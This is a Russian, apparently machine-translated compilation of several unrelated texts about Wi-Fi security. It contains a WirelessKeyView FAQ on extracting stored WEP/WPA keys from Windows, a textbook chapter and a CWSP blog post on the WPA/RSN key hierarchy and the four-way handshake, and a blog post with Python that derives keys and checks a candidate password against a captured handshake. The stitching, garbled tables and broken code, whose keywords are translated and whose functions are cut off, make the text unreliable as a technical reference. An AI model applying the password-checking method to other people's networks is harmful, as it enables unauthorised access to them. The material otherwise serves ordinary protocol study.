WirelessKeyView FAQ (Восстановление ключа WEP / WPA)

WirelessKeyView — это инструмент, который может восстановить потерянные ключи беспроводной связи (WEP / WPA), хранящиеся на вашем компьютере, в операционной системе Windows. На следующей странице вы можете найти ответы на часто задаваемые мной вопросы относительно моей утилиты WirelessKeyView.

В: Мой антивирус обнаружил, что внутри WirelessKeyView есть вирус / троян. Это правда ?

О: Нет, в утилите WirelessKeyView нет вирусов / троянцев / шпионских программ. Предупреждение, отображаемое вашим антивирусным программным обеспечением
является «ложным положительным результатом». Вам следует попросить вашу антивирусную компанию решить проблему.

В: Когда я пытаюсь загрузить утилиту WirelessKeyView, я получаю ошибку «Не удается отобразить страницу».В чем проблема ?
О: Вероятно, у вас установлен брандмауэр, который блокирует загрузку файла.
Попробуйте проверить настройки своего брандмауэра и настроить его таким образом, чтобы он позволял вам загружать файл.

В: Я запускаю WirelessKeyView, и он дает мне очень длинный ключ WPA-PSK в столбце «Ключ (шестнадцатеричный)», который не является
оригинальный ключ, который я использовал. Могу ли я получить исходный ключ Ascii?

О: В Windows XP после ввода ключа WPA-PSK он автоматически преобразуется в 256-битный ключ, который отображается WirelessKeyView в столбце «Ключ (шестнадцатеричный)».Этот новый ключ не может быть преобразован обратно в исходный ключ, который вы ввели, но вы можете использовать этот ключ для подключения к беспроводной сети точно так же, как исходный ключ.

В Windows Vista ключ WPA-PSK не преобразуется в другой ключ, поэтому вы можете получить исходный ключ, который вы ввели.

В: Могу ли я использовать WirelessKeyView для взлома беспроводного ключа в сети моего соседа?

О: Нет. WirelessKeyView не может взломать беспроводной ключ других беспроводных сетей.Он может получить только ключ
который хранится на вашем собственном компьютере в сети, к которой вы уже подключались в прошлом. Если вы хотите подключиться к сети вашего соседа, просто попросите его дать вам свой ключ …

В: В каком месте реестра Windows XP хранит ключ беспроводной сети?

О: Ключи беспроводной сети хранятся в реестре под HKEY_LOCAL_MACHINE \ SOFTWARE \ Microsoft \ WZCSVC \ Parameters \ Interfaces \ [Interface Guid].
[Interface Guid] — это уникальный идентификатор GUID, представляющий вашу беспроводную сетевую карту.Ключи хорошо зашифрованы операционной системой Windows, поэтому вы не можете просматривать их с помощью RegEdit.

В: В каком месте реестра Windows Vista хранит беспроводной ключ?
О: Windows Vista больше не хранит беспроводные ключи в реестре. Вместо этого ключи хранятся в файловой системе —
в папке c: \ ProgramData \ Microsoft \ Wlansvc \ Profiles \ Interfaces \ [Interface Guid].
[Interface Guid] — это уникальный идентификатор GUID, представляющий вашу беспроводную сетевую карту.Ключи хранятся и хорошо зашифрованы в файлах .xml, которые вы можете найти по указанному выше пути.

В: Я запускаю WirelessKeyView и получаю пустое окно без ключа. Я на 100% уверен, что там беспроводной ключ
хранится в моем компьютере. В чем проблема ?

A: Некоторые поставщики беспроводных карт используют стороннее программное обеспечение для подключения и управления беспроводными соединениями вместо
с помощью встроенной поддержки беспроводной связи, которая поставляется с Windows XP / Vista.
В этих случаях беспроводные ключи хранятся в других местах, и WirelessKeyView не может их получить.
В: У меня операционная система Windows, которая больше не может загружаться, но файлы на жестком диске все еще доступны.
Могу ли я получить беспроводной ключ, хранящийся в этом аппарате?

О: Да, но только если на мертвой машине стоит Windows XP.
Для этого просто запустите WirelessKeyView с параметром / external, например:
WirelessKeyView.exe / external «c: \ windows»

: Глава 10. Иерархия ключей WPA и RSN :: Часть II: Дизайн безопасности Wi-Fi :: 802.11 безопасность. Wi-Fi защищенный доступ и 802.11i :: Networking :: eTutorials.org

В этом разделе описаны форматы сообщений и обмены, которые используются при установлении иерархии ключей. В частности, мы показываем формат кадра, используемый для кадров EAPOL-Key, используемых при четырехстороннем и двустороннем обмене. Подробности, показанные здесь, относятся конкретно к WPA, но в основном аналогичны IEEE 802.11i TKIP и AES.

До обмена ключами и получения временного ключа уже должно было произойти несколько вещей.Точка доступа объявила о своих возможностях, а мобильное устройство выбрало метод безопасности, связало его и инициировало обмен аутентификацией. Если используется аутентификация верхнего уровня, обмен между запрашивающим и сервером аутентификации будет завершен, что приведет к доставке PMK в точку доступа. Точка доступа перехватит сообщение EAP-Success и доставит его запрашивающему. Получение EAP-Success точкой доступа запускает четырехсторонний обмен ключами.

В WPA обмен ключами выполняется с использованием специального варианта сообщения EAPOL-Key, который отличается от того, который определен в IEEE 802. 1X. Этот вариант имеет несколько дополнительных полей и показан на рисунке 10.7.

Рисунок 10.7. Версия WPA дескриптора ключа EAPOL

Дескриптор, показанный на рисунке 10.7, появляется в разделе тела сообщения кадра EAPOL. На практике ему будет предшествовать заголовок EAPOL, соответствующий IEEE 802.11. Назначение каждого поля описано в Таблице 10.1. Самое сложное поле — это ключевая информация, которая разделена на несколько управляющих битов и подполей. Понимание содержимого этого поля необходимо для понимания того, как работает рукопожатие. Поле ключевой информации представляет собой 16-битное значение, разделенное на части, как показано на рисунке 10.8. и описано в таблице 10.2. Значение управляющих битов с 5 по 9 показано в таблице 10.3.

Рисунок 10.8. Поле ключевой информации

Таблица 10.1. Поля сообщения WPA EAPOL-Key

Тип дескриптора

Уникальное значение (254), которое идентифицирует этот дескриптор как вариант WPA.

Информация о ключе

Это поле содержит несколько подполей, которые предоставляют информацию о типе ключа и о том, как его следует использовать. Он также содержит различные управляющие биты для помощи в процедуре установления связи.

Длина ключа

Длина ключа в байтах. Обратите внимание, что в парном ключе это длина PTK, даже если фактический PTK не отправляется в ключевом кадре; это целевой ключ.

Счетчик воспроизведения

Это значение увеличивается с каждым сообщением для обнаружения любых попыток воспроизведения старого сообщения. Исключение составляют случаи, когда это сообщение является ответом на запрос ACK, и в этом случае вставляется значение воспроизведения сообщения, которое является «ACKed».

Key Nonce

Nonce Значение, используемое для получения временных парных ключей или групповых ключей.

EAPOL-Key IV

Для передачи группового ключа GTK зашифровывается с использованием ключа шифрования EAPOL-Key в сочетании с этим значением IV.Зашифрованный GTK помещается в область ключевых данных.

Начало последовательности клавиш

Указывает значение порядкового номера, ожидаемого в первом кадре, полученном после установки ключей. Порядковый номер защищает от атак повторного воспроизведения.

Идентификатор ключа

Не используется в WPA. В будущем его можно будет использовать для предварительной настройки нескольких ключей.

Key MIC

Это значение проверки целостности, вычисленное для всего кадра EAPOL-Key от поля версии протокола EAPOL до конца материала ключа (это поле устанавливается в 0 во время вычисления) .

Длина ключевых данных

Определяет количество байтов в поле ключевых данных (которое может отличаться от самого фактического ключа).

Ключевые данные

Материал, который необходимо отправить секретно. Например, в случае группового ключа это зашифрованное значение GTK. В некоторых сообщениях с парными ключами это несет информационный элемент.

Таблица 10.2. Сводка полей ключевой информации

Биты 0–3

В настоящее время не используются и установлены на 0.

Биты 4–9

Управляющие биты, установленные на разных этапах рукопожатие.

Биты 10–11

Указывают индекс ключа в случае групповых ключей. Это позволяет обновлять ключи с опозданием, устанавливая новые групповые ключи в позиции индекса, отличной от текущего ключа группы операций.

Бит 12

Различает сообщения с парными и групповыми ключами

Биты 13-15

Указывает версию и позволяет использовать различные схемы и методы шифрования ключей в будущее. Значение 001 означает, что:

EAPOL MIC рассчитывается с использованием HMAC-MD5

Шифрование ключа

EAPOL выполняется с использованием RC4

Таблица 10.3. Биты управления сообщением ключа EAPOL

Запрос

Этот бит используется соискателем для запроса, чтобы аутентификатор инициировал новое четырехстороннее рукопожатие для обновления ключей.

Ошибка

В TKIP (см. Главу 11), если сбой MIC обнаруживается мобильным устройством, отправляется ключевое сообщение с установленным битом ошибки для информирования точки доступа. Бит запроса также будет установлен для запроса операции смены ключа.

Безопасный

Устанавливается, когда четырехсторонний обмен ключами завершен, чтобы указать, что ссылка теперь безопасна.

MIC

Этот бит используется, чтобы указать, когда MIC был вычислен для этого сообщения и вставлен в поле MIC.

ACK

Устанавливается в сообщениях от аутентификатора, чтобы указать, что он ожидает ответа от запрашивающего.

Установить

Для парных ключей этот бит указывает, что новый ключ следует установить и ввести в действие. Для групповых ключей этот бит равен 0.

Поле Key Data используется по-разному при парном и групповом квитировании ключей. Вы можете ожидать, что это поле будет использоваться для отправки фактического ключа другой стороне, зашифрованного с помощью ключа шифрования EAPOL-Key. Это верно в случае GTK; однако парные ключи вычисляются независимо запрашивающей стороной и аутентификатором и вообще не отправляются в ключевом сообщении.

В случае парных ключей поле Key Data используется для другой цели. Он используется для отправки копии информационного элемента WPA / RSN. Информационные элементы в целом описаны в Главе 5, и этот элемент, в частности, обсуждается далее в Главе 13. На данный момент просто примите тот факт, что информационный элемент необходимо передать и что для этой цели используется поле Key Data.

Четырехстороннее рукопожатие

Один из лучших способов понять использование дескриптора EAPOL-Key — это рассмотреть практический пример. В следующих параграфах мы будем следовать четырехстороннему рукопожатию.

Сообщение (A): запрашивающее устройство аутентификации

В начальном состоянии ключи не известны, поэтому вычислить MIC невозможно. Аутентификатор использует это сообщение только для того, чтобы послать запрашивающему свое значение ANonce. Содержание сообщения (A) показано в таблице 10.4.

0

9001

ANonce

Таблица 10.4. Сообщение (A) Содержание

Тип дескриптора

254

Ключевая информация

Запрос, ошибка:
0

Безопасность:
0

MIC:
0

Подтверждение:
1

Установить:
0

Индекс:
0

Тип ключа:
Попарно

Тип дескриптора:
1

Длина ключа

64

Счетчик повторов

<текущее значение>

Ключ Nonce

9001 -Key IV

0

RSC

0

Идентификатор ключа

0

1

Длина ключевых данных

0

  • Бит ошибки равен 0, потому что это первое сообщение.

  • Бит защиты равен 0, поскольку четырехэтапное рукопожатие еще не завершено.

  • Нет MIC, поэтому бит MIC равен 0.

  • Аутентификатор требует, чтобы соискатель послал ответ, поэтому он устанавливает бит ACK. Если по истечении тайм-аута ответ не получен, аутентификатор может повторно отправить сообщение три раза, прежде чем отказаться. Однако сообщение должно быть повторно отправлено как есть, то есть с тем же полем воспроизведения, чтобы в случае, если соискатель действительно получил предыдущее сообщение, он знал, что это дубликат, а не новое сообщение.

  • Мы не готовы к установке ключей, поэтому Install равно 0.

  • Поле Index не используется с парными ключами.

  • В поле Key Type указано «попарно», а в поле Descriptor Type установлено значение 1.

  • Счетчик воспроизведения — это значение счетчика, которое устанавливается в 0 при первой установке PMK и увеличивается между последовательные сообщения.

  • Значение ANonce передается в поле Key Nonce, а все остальные поля устанавливаются в 0.Обратите внимание, что значением ANonce не может быть какой-либо старый одноразовый номер. Его нужно выбирать особым образом, как описано далее в этой главе.

  • Значение EAP-Key IV равно 0, потому что отсутствуют ключевые данные.

  • RSC равен 0, потому что ключи еще не готовы для установки.

  • Идентификатор ключа зарезервирован и всегда 0.

Сообщение (A) отправляется без какой-либо защиты. Он не зашифрован и у него нет MIC. Это единственное ключевое сообщение, которое когда-либо отправлялось без установки бита MIC в 1 — факт, который может быть использован соискателем, который должен отбросить сообщение, если какое-либо из фиксированных полей отличается от того, что было описано здесь.Например, если запрашивающий видит бит MIC как 0, но установлен бит установки, он знает, что это нечестная игра.

Учитывая, что соискатель проверяет ожидаемые поля, злоумышленник ограничен изменением счетчика повторов или полей ANonce. Изменение счетчика повторов может привести только к отклонению сообщения, поэтому бессмысленно. Любые изменения значения ANonce будут зафиксированы в сообщении (B), поскольку временные ключи, вычисленные запрашивающей стороной из поврежденного значения ANonce, будут недопустимыми.В таком случае сообщение (B) не пройдет проверку MIC и будет отброшено. Таким образом, тот факт, что сообщение (A) не защищено, не ставит под угрозу безопасность.

Сообщение (B): аутентификатор запрашивающего

После успешной доставки первого сообщения соискатель получает копию ANonce и генерирует для нее собственное значение SNonce. Затем он может вычислить временный ключ. Затем он готовится отправить сообщение (B) аутентификатору. Это сообщение содержит значение MIC и, таким образом, доказывает, что запрашивающий знает PMK.Поля для сообщения (B) показаны в таблице 10.5.

OL

Таблица 10.5. Сообщение (B) Содержание

Тип дескриптора

254

Ключевая информация

Запрос, ошибка:
0

Безопасность:
0

MIC:
1

Подтверждение:
0

Установить:
0

Индекс:
0

Тип ключа:
Попарно

Тип дескриптора:
1

Длина ключа

64

Счетчик повторного воспроизведения

Из rcvd Ключевое сообщение

Key Nonce

ESP -Key IV

0

RSC

0

Идентификатор ключа

0

0

1 Значение MIC

Длина ключевых данных

Длина ключевых данных

Ключевые данные

Информационный элемент

  • Поле ошибки имеет значение 0, поскольку в предыдущем кадре не было значения MIC (поэтому выход из строя MIC невозможен).

  • В поле Secure остается 0 до окончания четырехстороннего рукопожатия.

  • Поле MIC равно 1, чтобы указать, что значение MIC было вычислено и прикреплено к этому сообщению.

  • Это сообщение является ответом на бит ACK, который был установлен в сообщении (A). Следовательно, бит ACK в этом сообщении снят.

  • Install установлен на 0, потому что ключи еще не согласованы.

  • Индекс не используется.

  • Тип ключа указывает попарно.

  • Тип дескриптора 1.

  • Счетчик воспроизведения в этом сообщении должен быть установлен на то же значение, что и счетчик, отправленный в сообщении (A). Это потому, что это ответ на бит ACK в сообщении (A). Любое другое значение должно быть отклонено аутентификатором.

  • Значение SNonce отправляется в поле Key Nonce. Это значение необходимо аутентификатору для вычисления своей копии временных ключей.

  • Значение MIC помещается в положение Key MIC.

  • Этот кадр содержит незашифрованные ключевые данные. Это информационный элемент, который использовался для согласования параметров безопасности на этапе ассоциации. Включение этого элемента предотвращает переключение несанкционированным мобильным устройством параметров безопасности после первоначального согласования. Более подробная информация об информационном элементе приведена в главе 13. Данные не зашифрованы, потому что IE был отправлен в открытом виде во время ассоциации и не является секретом; однако он защищен полем MIC и поэтому не может быть изменен.

Тот факт, что поле типа дескриптора равно 1, указывает на то, что значение MIC должно быть вычислено с использованием алгоритма HMAC-MD5, который выдает 16-байтовое значение MIC. Расчет MIC выполняется более чем для одного сообщения (B). Он включает в себя все байты из поля версии протокола EAPOL в заголовке до ключевых данных включительно.

MD5 — это алгоритм дайджеста сообщения — он принимает сообщение произвольной длины и выдает 128-битное значение, называемое дайджестом сообщения. Не имеет значения, какова длина входного сообщения, дайджест всегда 128 бит. Разные входные сообщения могут давать один и тот же дайджест сообщения. Однако алгоритм таков, что вы не можете работать в обратном направлении: учитывая 128-битный дайджест, вы не можете вычислить сообщение, которое будет выдавать это значение при обработке. Поэтому публикация дайджеста ничего не дает о сообщении. MD5 задокументирован в RFC 1321.

Чтобы применить MD-5 к фактическим сообщениям с целью MIC, MD-5 используется с хеш-кодом аутентификации сообщения.HMAC, как определено в RFC 2104.

Чтобы вычислить MIC, соискателю необходимо использовать вновь вычисленные временные ключи. Фактически, это будет первое использование ключей. Если запрашивающий не знает правильного PMK, он не может произвести значение MIC, которое будет соответствовать ожидаемому результату. Таким образом, MIC в этом сообщении выполняет две задачи: он предотвращает подделку сообщения и доказывает, что запрашивающий знает PMK.

Сообщение (C): запрашивающее устройство проверки подлинности

Когда сообщение (B) получено аутентификатором, он может извлечь значение SNonce, потому что сообщение не зашифровано.Затем аутентификатор получает всю информацию для вычисления своей копии временных ключей. После этого парное распределение ключей фактически завершено. Однако остальные обмены сообщениями, сообщения (C) и (D), используются для обеспечения того, чтобы ключи вступили в силу синхронизированным образом. Сообщение (C) выполняет две функции. Сначала он проверяет запрашивающему, что аутентификатор знает PMK и, следовательно, является доверенной стороной. Во-вторых, он сообщает запрашивающему, что аутентификатор готов к установке и начинает использовать ключи шифрования данных.Аутентификатор фактически не устанавливает ключи до тех пор, пока не получит сообщение (D). Обратите внимание, что если повторная передача сообщения (C) необходима из-за невозможности получить ответ, повторная передача должна быть копией исходной (незашифрованной) передачи. Формат сообщения (C) показан в Таблице 10.6.

Устанавливается бит MIC и добавляется соответствующее значение MIC. Бит ACK установлен, чтобы указать, что требуется ответ. Значение ANonce включено для справки; хотя на данный момент это не имеет смысла, его можно использовать в качестве проверки, чтобы убедиться, что это часть того же четырехстороннего рукопожатия.

Таблица 10.6. Сообщение (C) Содержание

Тип дескриптора

254

Ключевая информация

Запрос, ошибка:
0

Безопасность:
0

MIC:
1

Подтверждение:
1

Установить:
0

Индекс:
0

Тип ключа:
Попарно

Тип дескриптора:
1

Длина ключа

64

Счетчик воспроизведения

<Текущее значение>

Ключевой одноразовый номер

9001 9001

9001 -Key IV

0

RSC

Начальный порядковый номер

Идентификатор ключа

0

0

Длина ключевых данных

Длина ключевых данных

Ключевые данные

Информационный элемент

В этом сообщении RSC используется для информирования мобильного устройства о запуске порядковый номер, который намеревается использовать точка доступа. Обычно это будет 0. Поле Key Data используется для отправки копии IE, которую точка доступа использовала для согласования безопасности во время фазы ассоциации.

Предполагая, что повторная передача не требуется, это последнее незашифрованное сообщение, отправленное аутентификатором в течение срока действия этих парных ключей. Все последующие сообщения шифруются и защищаются с помощью временных ключей данных.

Сообщение (D): аутентификатор запрашивающего

Это последнее сообщение подтверждает аутентификатору, что ключи собираются установить.Настройки в сообщении показаны в Табл. 10.7.

Нет ничего удивительного или нового в настройках этого сообщения, которое похоже на сообщение (B), но без поля Key Data. Бит безопасности не устанавливается до тех пор, пока четырехстороннее рукопожатие не будет успешно завершено и и запрашивающая сторона, и аутентификатор не установят ключи. Это не произойдет, пока сообщение (D) не будет получено и успешно декодировано. Как только это произойдет, аутентификатор сможет доставить групповые ключи.Обратите внимание, что поле Key Sequence Start указывает аутентификатору порядковый номер первого кадра, который запрашивающий намеревается отправить.

OL

Таблица 10.7. Сообщение (D) Содержание

Тип дескриптора

254

Ключевая информация

Запрос, ошибка:
0

Безопасность:
0

MIC:
1

Подтверждение:
0

Установить:
1

Индекс:
0

Тип ключа:
Попарно

Тип дескриптора:
1

Длина ключа

64

Счетчик повторов

Из rcvd Ключевое сообщение

Key Nonce

ESP -Key IV

0

RSC

Начальный порядковый номер

Идентификатор ключа

0

Длина ключевых данных

0

Групповое рукопожатие клавиш

После сложностей парного обмена ключами, который должен был начинаться без обеспечения безопасности и наращиваться шаг за шагом, групповая доставка ключей является относительно простой. В основном сообщений всего два. Первый отправляет ключ, а второй подтверждает, что ключи установлены. Как объяснялось ранее, сообщение о синхронизации ключей отсутствует, поскольку мобильное устройство может хранить более одного ключа группы одновременно, а точка доступа может выбирать ключ, используемый для каждого сообщения. Следовательно, если точка доступа знает, что был установлен новый ключ, она может начать использовать его в любой момент в будущем; обычно это происходит после обновления всех остальных мобильных устройств.

Групповой ключ отправляется в сообщении EAPOL-key, которое мы будем называть сообщением (a). Он имеет тот же формат, что и для парных ключей. Однако важным отличием является то, что поле Key Data используется для отправки GTK. Поля для первого сообщения группового ключа показаны в Таблице 10.8.

901

установлен безопасный бит, потому что обмен групповым ключом происходит после попарного ключи установлены. MIC установлен (и включен), а бит ACK указывает, что требуется ответ. Для сообщения Group Key установлен бит Install. Поле индекса важно в ключевом сообщении группы. Эти два бита указывают, какое расположение ключа следует использовать для хранения нового ключа. Для плавных обновлений значение индекса Key ID не будет текущим значением.

Значение GNonce включено для справки. GNonce — это одноразовое значение, выбранное для получения GTK из GMK. Соискателю на самом деле не нужно знать это значение, потому что получение ключа выполняется точкой доступа, а не мобильным устройством, но оно все равно отправляется для справки.

Наконец, отправляется фактический GTK, зашифрованный с помощью ключа шифрования EAPOL, который был создан как часть рукопожатия парных ключей. Для дескриптора типа 1 ключ шифруется с использованием потокового шифра RC4 после отбрасывания первых 256 байтов выходного потока шифра RC4. Заполнение не добавляется, поэтому 32 байта GTK образуют 32 зашифрованных байта, которые помещаются непосредственно в сообщение EAPOL-Key.

После заполнения на мобильное устройство отправляется сообщение (a), которое может расшифровать GTK и установить его в соответствующий индекс Key ID.Затем он отвечает сообщением подтверждения, сообщением (b), которое имеет то же самое, что и для парного сообщения (D), за исключением того, что установлен бит безопасности, а бит типа указывает группу.

В качестве последнего пункта ожидается, что групповые ключи будут обновляться довольно регулярно. Например, они должны обновляться, когда мобильное устройство покидает сеть. Также они должны обновляться, если при декодировании многоадресной рассылки происходит сбой MIC. Обновления ключей могут происходить в любое время просто путем инициирования точкой доступа кадра обновления группового ключа путем отправки сообщения (а).Однако они также могут быть запрошены мобильным устройством. В этом случае мобильное устройство должно отправить сообщение (b) в точку доступа с установленным битом ACK. Это заставляет точку доступа создавать новый GTK и распространять его на все устройства (по одному).

CWSP — 4-стороннее рукопожатие

В этом посте мы рассмотрим процесс четырехстороннего рукопожатия. Это описано в главе 5 официального учебного пособия CWSP. На странице 194 этой книги показана приведенная ниже иерархия ключей RSN. Также посмотрите это видео CWNP, чтобы получить более подробную информацию об этой иерархии ключей.

Главный сеансовый ключ MSK (или ключ AAA):
Информация о ключе, которая согласовывается совместно между запрашивающим устройством и сервером аутентификации. Эта ключевая информация передается по защищенному каналу от сервера аутентификации к аутентификатору.

PMK — парный мастер-ключ:
PMK получен из посевного материала MSK. PMK — это первые 256 бит (0–255) MSK. Он может быть получен из метода EAP или непосредственно из PresharedKey (PSK).

Мастер-ключ

GMK-Group:
GMK создается случайным образом на Authenticator и обновляет его через заданный интервал времени, чтобы снизить риск взлома GMK.

PTK-парный переходный ключ:
Значение, полученное из PMK, одноразового номера аутентификатора (Anonce), одноразового номера запрашивающего (Snonce), адреса аутентификатора, адреса запрашивающего. Это используется для шифрования всей одноадресной передачи между клиентом и точкой доступа. ПТК состоит из 5 разных ключей

1. KCK-Key Confirmation Key — используется для обеспечения целостности данных во время 4-стороннего согласования и согласования группового ключа.
2. KEK — ключ шифрования ключа — используется кадрами EAPOL-Key для обеспечения конфиденциальности данных во время четырехстороннего и группового рукопожатия.
3. Временной ключ — используется для шифрования и дешифрования MSDU кадров данных 802.11 между запрашивающим и аутентификатором.
4. Временной MIC-1
5. Временной MIC-2

GTK-Group Temporal Key:
GTK используется для шифрования всей широковещательной / многоадресной передачи между AP и несколькими состояниями клиентов. GTK выводится на аутентификаторе и отправляется запрашивающему во время 4-стороннего рукопожатия (M3)

4-стороннее квитирование с использованием кадров EAPOL-Key, инициированных аутентификатором для выполнения следующих действий.
1. Подтвердите, что активный партнер удерживает PMK
2. Подтвердите, что PMK является текущим.
3. Получите новый PTK из PMK и установите парные ключи шифрования и целостности в 802.11
4. Перенесите порядковые номера GTK и GTK от Authenticator к Supplicant и установите их в Supplicant & AP (если еще не установлены)
5. Подтвердите выбор набора шифров.

Если это PSK, четырехстороннее квитирование начинается сразу после завершения состояния аутентификации открытой системы и ассоциации, как вы можете видеть ниже.

Если это 802.1X / EAP, то после завершения аутентификации EAP начинается четырехстороннее рукопожатие.

На рисунке ниже показаны этапы процесса 4-стороннего подтверждения. Это видео CWNP хорошо объясняет этот процесс и сначала рассмотрите его, прежде чем вдаваться в подробности.

Вот подробности о каждом шаге. Вы можете фильтровать сообщения EAPOL-Key, используя фильтр отображения «eapol.keydes.type == 2».

Сообщение 1 (M1)
* Аутентификатор отправляет запрашивающему кадр EAPOL-Key, содержащий ANonce (одноразовый номер аутентификатора).
* С этой информацией запрашивающий имеет все необходимые данные для генерации PTK с использованием псевдослучайной функции (PRF)

Сообщение 2 (M2)
* Запрашивающая сторона отправляет аутентификатору кадр EAPOL-Key, содержащий SNonce.
* Теперь у аутентификатора есть все входы для создания PTK.
* Запрашивающая сторона также отправила возможности RSN IE в аутентификатор и MIC.
* Аутентификатор извлекает PTK и также проверяет MIC.

Сообщение 3 (M3)
* При необходимости Authenticator извлечет GTK из GMK.
* Аутентификатор отправляет кадр EAPOL-Key, содержащий ANonce, RSN-IE и MIC.
* GTK будет доставлен (зашифрован с помощью PTK) запрашивающему.
* Сообщение просителю установить временные ключи.

Сообщение 4 (M4)
* Запрашивающая сторона отправляет последний кадр ключа EAPOL аутентификатору, чтобы подтвердить, что временные ключи установлены.

С этого момента кадр данных MSDU будет зашифрован с использованием PTK или GTK (в зависимости от одноадресного или многоадресного / широковещательного кадра)

Список литературы
1. WPA2-PSK-Final -Sample Packet Capture (кадры 93-99 показывают ключевые кадры EAPOL M1-M4)
2. Официальное учебное руководство CWSP
3. http://www.my80211.com/cwsp-george-stefanick/
4. 802.11i AKM CWNP — Белая книга

Связанное сообщение

1. CWSP — Метод шифрования L2: WEP
2. CWSP — Метод шифрования L2: CCMP
3. CWSP — Метод шифрования L2: TKIP
4. CWSP — Информационный элемент RSN
5.
6.

Нравится:

Нравится Загрузка …

Связанные

Создание ключей WPA2 с помощью Anaconda Python — nicholastsmith

Этот пост касается 4-стороннего подтверждения WPA2, который используется для аутентификации и создания ключей шифрования для безопасной беспроводной связи.Практическая реализация процесса получения ключа предоставляется на языке Python. Образец захвата пакета, содержащий 4-стороннее рукопожатие, который используется в этом посте, доступен здесь. Полный исходный код, обсуждаемый в этом посте, находится на Github. Программное обеспечение Wireshark используется для анализа предоставленной трассировки пакета.

Первый пакет в приведенной выше трассе — это кадр маяка , транслируемый от точки доступа. Точки доступа периодически передают кадры маяка, чтобы сообщить о своем присутствии ближайшим устройствам.Как показано на рисунке 1 ниже, адресом назначения для кадра маяка является широковещательный адрес: FF: FF: FF: FF: FF: FF.

Рисунок 1: MAC-адрес назначения кадра маяка

Кадр маяка также содержит поле SSID , которое потребуется на более поздних этапах. SSID — это имя сети. Как видно на Рисунке 2 ниже, SSID для точки доступа, найденной в этом захвате пакета, — Harkonen .

Рисунок 2: SSID кадра маяка

Следующие четыре пакета захвата составляют так называемое 4-стороннее квитирование WPA2 .Это рукопожатие используется для установления подлинности двух конечных точек и ключей шифрования.

Рисунок 3: Схема последовательности четырехстороннего квитирования

На рисунке 3 выше показана базовая диаграмма последовательности этапов четырехстороннего рукопожатия. В следующих разделах подробно рассматривается каждый шаг.

В первом пакете рукопожатия точка доступа отправляет сообщение на станцию. Ключевой частью этого первого шага рукопожатия является 256-битное поле WPA Key Nonce (число, используемое один раз), также известное как ANonce .ANonce — это случайно сгенерированное число, которое будет использоваться для установления парного переходного ключа (PTK). PTK используется для шифрования последующего обмена данными между точкой доступа и станцией.

Рисунок 4: Поле ANonce

На рис. 4 выше показан захват первого выделенного сообщения с полем WPA Key Nonce.

После того, как станция принимает первое сообщение, она генерирует свой собственный одноразовый номер, называемый SNonce. Станция, если она знает PMK, имеет достаточно информации для генерации PTK.PTK рассчитывается следующим образом:

# Используется для вычисления HMAC
импорт hmac
# Используется для преобразования из шестнадцатеричного в двоичный
из binascii импортировать a2b_hex, b2a_hex
# Используется для расчета ПМК
из hashlib import pbkdf2_hmac, sha1, md5

# Псевдослучайная функция для генерации
# попарный переходной ключ (ПТК)
#key: ПМК
#A: b'Парное расширение ключа '
#B: объединение apMac, cliMac, aNonce и sNonce
# как mac1 mac2 nonce1 nonce2
# такие, что mac1  
#cliMac: MAC-адрес клиента.
#return: (A, B) где A и B - параметры
# для генерации ПТК
def MakeAB (aNonce, sNonce, apMac, cliMac):
    A = b "Попарное раскрытие ключа"
    B = min (apMac, cliMac) + max (apMac, cliMac) + min (aNonce, sNonce) + max (aNonce, sNonce)
    возврат (A, B)

# Вычислить первую проверку целостности сообщения для 4-стороннего рукопожатия WPA
#pwd: пароль для проверки
#ssid: SSID точки доступа
#A: b'Парное расширение ключа '
#B: объединение apMac, cliMac, aNonce и sNonce
# как mac1 mac2 nonce1 nonce2
# такие, что mac1  new (ptk [0:16], i, hmacFunc) .digest () для i в данных]
    возврат (микрофоны, PTK, PMK)
 

Примечание: В приведенном выше коде предполагается, что PMK вычисляется на основе общего ключа (PSK). Это известно как WPA2-PSK и широко используется в домашних сетях Wi-Fi. В WPA2-PSK PMK вычисляется с использованием PBKDF2 и HMAC-SHA1, как показано в приведенном выше коде.

Во втором сообщении станция отвечает точке доступа. Два ключевых компонента второго сообщения — это 256-битный SNonce, который был вычислен ранее, и 128-битная проверка целостности сообщения (MIC).SNonce — это последняя часть информации, которая необходима точке доступа для вычисления PTK. MIC проверяет, знает ли станция PTK, а значит, и PMK. Поле SNonce выделено ниже на рисунке 5.

Рисунок 5: Поле SNonce

ANonce и SNonce — это случайно сгенерированные числа для предотвращения атак повторного воспроизведения. : атака, при которой злоумышленник пытается аутентифицироваться, используя ранее захваченный пакет. Сверху можно увидеть, что PTK зависит от ANonce и SNonce, и поэтому он отличается от соединения к соединению; техника, которая предотвращает повторные атаки.

Обратите внимание, однако, что до этого момента аутентификация еще не была выполнена; ни одна из сторон не проверила, действительно ли другая знает ПМК. Это задача поля WPA Key MIC, показанного ниже на рисунке 6.

Рисунок 6. WPA Key MIC 1

Поле WPA Key MIC вычисляется путем взятия всех полей 802.1x и вычисления для них HMAC. Когда вычисление выполняется, само поле MIC устанавливается на все нули. Примечание: Для WPA используется псевдослучайная функция (PRF) MD5 , а для WPA2 используется алгоритм SHA1 .На рисунке 7 ниже показаны данные, которые будут использоваться в Wireshark. Поскольку MD5 выдает 128-битное значение, а SHA1 дает 160-битное значение, в дайджесте сохраняются только первые 128 битов. Это можно сделать, отбросив последние 8 шестнадцатеричных значений.

Рисунок 7: Раздел данных пакета WPA2 EAPOL 2

Как видно из вышеизложенного, MIC может быть вычислен, только если PTK и, следовательно, PMK, известны. Определяя MIC таким образом, каждая сторона может проверить, что другой знает PMK, даже не передавая PMK.Третья сторона, которая является свидетелем 4-стороннего рукопожатия, по-прежнему не может определить PMK или PTK.

Третий пакет четырехстороннего рукопожатия по духу аналогичен второму. Обратите внимание на рисунке 8 ниже, что он также содержит поле WPA Key MIC и WPA Key Data. Поле MIC будет служить для аутентификации точки доступа к станции. После проверки MIC станция знает, что точка доступа владеет PTK и, следовательно, PMK. Предполагается, что только подлинная точка доступа знает PMK, и, таким образом, подлинность точки доступа подтверждается.Метод вычисления второго MIC такой же, как и для первого.

Рисунок 8: Ключ WPA MIC 2

Третий пакет 4-стороннего рукопожатия также содержит групповой временный ключ (GTK), который используется для шифрования и дешифрования всех передач широковещательных данных между точкой доступа и ее клиентами. GTK зашифрован в поле данных ключа WPA третьего пакета.

Последний пакет четырехстороннего рукопожатия — это подтверждение точке доступа, что станция получила соответствующие ключи и начнется зашифрованная связь.Четвертый пакет также содержит поле MIC, которое вычисляется так же, как и предыдущие MIC.

